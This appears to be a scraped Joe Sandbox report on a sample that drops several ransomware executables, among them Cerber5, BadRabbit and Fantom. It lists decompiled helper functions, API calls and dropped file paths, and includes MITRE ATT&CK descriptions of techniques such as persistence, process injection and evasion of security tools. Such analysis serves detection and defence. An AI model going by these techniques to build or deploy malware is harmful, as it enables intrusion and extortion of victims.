Part of subcall function 004049E4: GetCurrentProcessId.KERNEL32(00404A1B,?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E), ref: 004049E4

RtlEnterCriticalSection.NTDLL(?), ref: 00404A90
GetCurrentThreadId.KERNEL32 ref: 00404A96
SetLastError.KERNEL32(?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?), ref: 00404AAF

Part of subcall function 004049F6: GetLastError.KERNEL32(0040D9D8,00000010,00405820,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C), ref: 00404A09
Part of subcall function 004049F6: RtlInitializeCriticalSection.NTDLL(?), ref: 00404A24
Part of subcall function 004049F6: GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?,0040678F), ref: 00404A2A
Part of subcall function 004049F6: SetLastError.KERNEL32(?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?), ref: 00404A4C

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: ErrorLast$Current$CriticalProcessSection$EnterInitializeThread
String ID:
API String ID: 2985312556-0
Opcode ID: 11db4a6207e87937c9456d00a85c428908f69b1342791137cee10eae4e53123c
Instruction ID: ed2fb18bf2bb44b178cf3cceb23bf943281626dd3940bfcf2b284636644175bb
Opcode Fuzzy Hash: 11db4a6207e87937c9456d00a85c428908f69b1342791137cee10eae4e53123c
Instruction Fuzzy Hash: 4CF082B4940302DBCB20BBB1DD0965E7764AF44315F20897FA922B65E0CB3D4A46DF5D

Uniqueness

Uniqueness Score: -1.00%

Function 00404AC0 Relevance: 6.0, APIs: 4, Instructions: 25
threadCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00404AC0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t20;
				void* _t22;

				_push(0xc);
				_push(0x40d9c8);
				E0040B654(__ebx, __edi, __esi);
				_t20 = __ecx;
				 *(_t22 - 0x1c) = GetLastError();
				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
				if(E004049E4(_t20) != 0) {
					if( *(_t20 + 4) == GetCurrentThreadId()) {
						 *(_t20 + 4) =  *(_t20 + 4) & 0x00000000;
					}
					_t12 =  *0x40f1e4(_t20 + 8);
				}
				 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
				SetLastError( *(_t22 - 0x1c));
				return E0040B68F(_t12);
			}

0x00404ac0
0x00404ac2
0x00404ac7
0x00404acc
0x00404ad4
0x00404ad7
0x00404ae4
0x00404aef
0x00404af1
0x00404af1
0x00404af9
0x00404af9
0x00404b08
0x00404b0f
0x00404b1a

APIs

GetLastError.KERNEL32(0040D9C8,0000000C,004058FD,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C), ref: 00404ACE

Part of subcall function 004049E4: GetCurrentProcessId.KERNEL32(00404A1B,?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E), ref: 004049E4

GetCurrentThreadId.KERNEL32 ref: 00404AE6
RtlLeaveCriticalSection.NTDLL ref: 00404AF9
SetLastError.KERNEL32(?,?,00000000,?,?,?,00405918,?,?,?,00000000,00402F10,0040D268,0000001C,C771AE8E,?), ref: 00404B0F

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: CurrentErrorLast$CriticalLeaveProcessSectionThread
String ID:
API String ID: 736899326-0
Opcode ID: c9943280ebc9ab71aa4115d391c0c0e18bb473fe2d3d34ce6aab4fdbcc10defd
Instruction ID: 5d87240e8550010a82cb58736f3ebd64beaf0934954977050a7740b7a28618f7
Opcode Fuzzy Hash: c9943280ebc9ab71aa4115d391c0c0e18bb473fe2d3d34ce6aab4fdbcc10defd
Instruction Fuzzy Hash: B6F0A0B5C01601DBCB20BBA0DE0939E7770AF4131AF21817EE511B25D1CB7D5A09CA4D

Uniqueness

Uniqueness Score: -1.00%

Function 00408485 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 209stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405693: lstrlen.KERNEL32(00000000,00405705,?,00000000), ref: 0040569B

FindMimeFromData.URLMON(00000000,?,00000000,00000000,00000000,00000001,?,00000000), ref: 0040855A
lstrcmpiW.KERNEL32(?,00000030), ref: 00408577

Strings

2, xrefs: 004085FD

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: DataFindFromMimelstrcmpilstrlen
String ID: 2
API String ID: 2072262229-450215437
Opcode ID: eabae05de98e41b67943d8209c423d2232d19600cbceb92798c23f60d53b8a29
Instruction ID: d05574d99582fdf8de803fc1e31f7f13cfa1da4baa173e70d20c9639e5a0a858
Opcode Fuzzy Hash: eabae05de98e41b67943d8209c423d2232d19600cbceb92798c23f60d53b8a29
Instruction Fuzzy Hash: FA7103B1D00209AFDF10DFA5C984AEEBBB9BF48304F01447AE945B7250DB3A9A45CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00405532 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(Cu@), ref: 00405537
gethostbyname.WS2_32(?), ref: 00405548

Strings

Cu@, xrefs: 00405533

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: gethostbynameinet_addr
String ID: Cu@
API String ID: 1594361348-2835949224
Opcode ID: 62d59bb6ca14fe2f23ab534400652e2285e1f6d5320143334bdc0b8d198bd4a6
Instruction ID: 4e8b9e47bf38c59bde1ecc2b7d999fb23bf2e5007af245ecbefbc72d7f427d54
Opcode Fuzzy Hash: 62d59bb6ca14fe2f23ab534400652e2285e1f6d5320143334bdc0b8d198bd4a6
Instruction Fuzzy Hash: 72D01735600520EFCB10AB29EC48946BBB1EB493B0B0546B1FA69B73B0C334DC50EA84

Uniqueness

Uniqueness Score: -1.00%

Function 00405568 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

shutdown.WS2_32(av@,00000002), ref: 0040556E
closesocket.WS2_32(?), ref: 00405578

Strings

av@, xrefs: 0040556A

Memory Dump Source

Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd

Yara matches

Similarity

API ID: closesocketshutdown
String ID: av@
API String ID: 572888783-3119376357
Opcode ID: cc947e4da2cd926d8f72edfa744815291745d11b9b859c304ff0b658672672c5
Instruction ID: ae5811c37d22f4f0b61787900125bfdb5bb523f9631432ff431403366cf658b5
Opcode Fuzzy Hash: cc947e4da2cd926d8f72edfa744815291745d11b9b859c304ff0b658672672c5
Instruction Fuzzy Hash: 93B00271544211ABDF215F52DF0EA197E61BBC4741F448CA8B29968071C7B24861FB16

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as Bash History and /var/log/*.
Tactics:	Defense Evasion
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report irH9zMhZub.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe

C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe

C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe

C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe

C:\Users\user\AppData\Local\Temp\Endermanch@InfinityCrypt.exe

C:\Users\user\AppData\Local\Temp\Endermanch@Krotten.exe

C:\Users\user\AppData\Local\Temp\Endermanch@NoMoreRansom.exe

C:\Users\user\AppData\Local\Temp\Fantom.exe

C:\Users\user\AppData\Local\Temp\d06ed635\4e9a.tmp

C:\Users\user\AppData\Local\Temp\d06ed635\68f6.tmp

Windows Analysis Report
irH9zMhZub.exe

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre